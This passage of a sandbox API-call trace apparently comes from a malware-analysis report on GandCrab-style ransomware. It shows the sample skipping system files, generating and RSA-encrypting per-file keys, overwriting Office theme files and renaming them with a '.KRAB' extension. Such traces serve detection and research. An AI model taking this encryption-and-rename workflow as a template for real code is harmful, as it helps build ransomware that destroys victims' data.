"c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033937[[fn=vapor trail]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0069.251] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0069.251] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0069.255] ReadFile (in: hFile=0x484, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x100000, lpOverlapped=0x0) returned 1 [0069.633] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.633] WriteFile (in: hFile=0x484, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x100000, lpOverlapped=0x0) returned 1 [0069.637] ReadFile (in: hFile=0x484, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x100000, lpOverlapped=0x0) returned 1 [0069.944] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.944] WriteFile (in: hFile=0x484, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x100000, lpOverlapped=0x0) returned 1 [0069.950] ReadFile (in: hFile=0x484, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x100000, lpOverlapped=0x0) returned 1 [0069.968] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.968] WriteFile (in: hFile=0x484, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x100000, lpOverlapped=0x0) returned 1 [0069.970] ReadFile (in: hFile=0x484, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x71abc, lpOverlapped=0x0) returned 1 [0069.993] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xfff8e544, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.993] WriteFile (in: hFile=0x484, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x71abc, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x71abc, lpOverlapped=0x0) returned 1 [0069.994] WriteFile (in: hFile=0x484, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0069.994] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.286] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.289] CloseHandle (hObject=0x484) returned 1 [0070.386] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.387] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033937[[fn=Vapor Trail]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033937[[fn=vapor trail]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033937[[fn=Vapor Trail]].thmx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033937[[fn=vapor trail]].thmx.krab")) returned 1 [0070.388] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.388] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0070.388] lstrcmpW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2=".") returned 1 [0070.388] lstrcmpW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="..") returned 1 [0070.388] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM10001103[[fn=Headlines]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001103[[fn=Headlines]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001103[[fn=Headlines]].thmx" [0070.388] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0070.388] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001103[[fn=Headlines]].thmx.KRAB") returned 138 [0070.389] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001103[[fn=Headlines]].thmx") returned 133 [0070.389] lstrlenW (lpString=".thmx") returned 5 [0070.389] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0070.389] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".thmx ") returned 6 [0070.389] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.389] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001103[[fn=Headlines]].thmx") returned 133 [0070.389] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001103[[fn=Headlines]].thmx") returned 133 [0070.390] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="desktop.ini") returned 1 [0070.390] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="autorun.inf") returned 1 [0070.390] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="ntuser.dat") returned 1 [0070.390] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="iconcache.db") returned 1 [0070.390] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="bootsect.bak") returned 1 [0070.390] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="boot.ini") returned 1 [0070.390] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="ntuser.dat.log") returned 1 [0070.390] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="thumbs.db") returned 1 [0070.390] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0070.390] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0070.390] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0070.390] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="ntldr") returned 1 [0070.390] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="NTDETECT.COM") returned 1 [0070.390] lstrcmpiW (lpString1="TM10001103[[fn=Headlines]].thmx", lpString2="Bootfont.bin") returned 1 [0070.390] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0070.390] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbb330) returned 1 [0070.391] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0070.391] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0070.392] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0070.392] CryptGenRandom (in: hProv=0xfbb330, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0070.392] CryptReleaseContext (hProv=0xfbb330, dwFlags=0x0) returned 1 [0070.392] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.392] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbb330) returned 1 [0070.392] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0070.393] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0070.393] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0070.394] CryptGenRandom (in: hProv=0xfbb330, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0070.394] CryptReleaseContext (hProv=0xfbb330, dwFlags=0x0) returned 1 [0070.394] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.394] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbba18) returned 1 [0070.394] CryptImportKey (in: hProv=0xfbba18, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xffe718) returned 1 [0070.394] CryptGetKeyParam (in: hKey=0xffe718, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0070.394] CryptEncrypt (in: hKey=0xffe718, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0070.395] GetLastError () returned 0x0 [0070.395] CryptDestroyKey (hKey=0xffe718) returned 1 [0070.395] CryptReleaseContext (hProv=0xfbba18, dwFlags=0x0) returned 1 [0070.395] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbba18) returned 1 [0070.395] CryptImportKey (in: hProv=0xfbba18, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xffe718) returned 1 [0070.396] CryptGetKeyParam (in: hKey=0xffe718, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0070.396] CryptEncrypt (in: hKey=0xffe718, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0070.396] GetLastError () returned 0x0 [0070.396] CryptDestroyKey (hKey=0xffe718) returned 1 [0070.396] CryptReleaseContext (hProv=0xfbba18, dwFlags=0x0) returned 1 [0070.396] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001103[[fn=Headlines]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001103[[fn=headlines]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0070.396] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0070.397] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0070.397] ReadFile (in: hFile=0x484, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x83bd9, lpOverlapped=0x0) returned 1 [0070.528] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xfff7c427, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.529] WriteFile (in: hFile=0x484, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x83bd9, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x83bd9, lpOverlapped=0x0) returned 1 [0070.552] WriteFile (in: hFile=0x484, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0070.553] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.566] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.568] CloseHandle (hObject=0x484) returned 1 [0070.599] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.599] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001103[[fn=Headlines]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001103[[fn=headlines]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001103[[fn=Headlines]].thmx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001103[[fn=headlines]].thmx.krab")) returned 1 [0070.600] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.600] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0070.600] lstrcmpW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2=".") returned 1 [0070.600] lstrcmpW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="..") returned 1 [0070.600] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM10001104[[fn=Feathered]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001104[[fn=Feathered]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001104[[fn=Feathered]].thmx" [0070.600] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0070.601] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001104[[fn=Feathered]].thmx.KRAB") returned 138 [0070.601] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001104[[fn=Feathered]].thmx") returned 133 [0070.601] lstrlenW (lpString=".thmx") returned 5 [0070.601] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0070.601] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".thmx ") returned 6 [0070.601] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.602] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001104[[fn=Feathered]].thmx") returned 133 [0070.602] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001104[[fn=Feathered]].thmx") returned 133 [0070.602] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="desktop.ini") returned 1 [0070.602] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="autorun.inf") returned 1 [0070.602] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="ntuser.dat") returned 1 [0070.602] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="iconcache.db") returned 1 [0070.602] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="bootsect.bak") returned 1 [0070.602] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="boot.ini") returned 1 [0070.602] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="ntuser.dat.log") returned 1 [0070.602] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="thumbs.db") returned 1 [0070.602] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0070.602] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0070.602] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0070.602] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="ntldr") returned 1 [0070.602] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="NTDETECT.COM") returned 1 [0070.602] lstrcmpiW (lpString1="TM10001104[[fn=Feathered]].thmx", lpString2="Bootfont.bin") returned 1 [0070.602] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0070.602] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x10121a0) returned 1 [0070.603] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0070.603] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0070.604] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0070.604] CryptGenRandom (in: hProv=0x10121a0, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0070.604] CryptReleaseContext (hProv=0x10121a0, dwFlags=0x0) returned 1 [0070.604] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.604] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1012668) returned 1 [0070.605] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0070.605] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0070.606] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0070.606] CryptGenRandom (in: hProv=0x1012668, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0070.606] CryptReleaseContext (hProv=0x1012668, dwFlags=0x0) returned 1 [0070.606] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.606] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x10122b0) returned 1 [0070.607] CryptImportKey (in: hProv=0x10122b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbd420) returned 1 [0070.607] CryptGetKeyParam (in: hKey=0xfbd420, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0070.607] CryptEncrypt (in: hKey=0xfbd420, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0070.607] GetLastError () returned 0x0 [0070.607] CryptDestroyKey (hKey=0xfbd420) returned 1 [0070.607] CryptReleaseContext (hProv=0x10122b0, dwFlags=0x0) returned 1 [0070.607] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x10122b0) returned 1 [0070.608] CryptImportKey (in: hProv=0x10122b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbd420) returned 1 [0070.608] CryptGetKeyParam (in: hKey=0xfbd420, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0070.608] CryptEncrypt (in: hKey=0xfbd420, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0070.608] GetLastError () returned 0x0 [0070.609] CryptDestroyKey (hKey=0xfbd420) returned 1 [0070.609] CryptReleaseContext (hProv=0x10122b0, dwFlags=0x0) returned 1 [0070.609] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001104[[fn=Feathered]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001104[[fn=feathered]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0070.609] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0070.609] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0070.610] ReadFile (in: hFile=0x484, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x100000, lpOverlapped=0x0) returned 1 [0070.780] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.780] WriteFile (in: hFile=0x484, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x100000, lpOverlapped=0x0) returned 1 [0070.782] ReadFile (in: hFile=0x484, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0xf53d4, lpOverlapped=0x0) returned 1 [0070.845] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xfff0ac2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.850] WriteFile (in: hFile=0x484, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0xf53d4, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0xf53d4, lpOverlapped=0x0) returned 1 [0070.852] WriteFile (in: hFile=0x484, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0070.852] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.903] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.907] CloseHandle (hObject=0x484) returned 1 [0071.167] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.168] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001104[[fn=Feathered]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001104[[fn=feathered]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001104[[fn=Feathered]].thmx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001104[[fn=feathered]].thmx.krab")) returned 1 [0071.168] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.169] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0071.169] lstrcmpW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2=".") returned 1 [0071.169] lstrcmpW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="..") returned 1 [0071.169] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM10001105[[fn=Crop]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001105[[fn=Crop]].thmx") 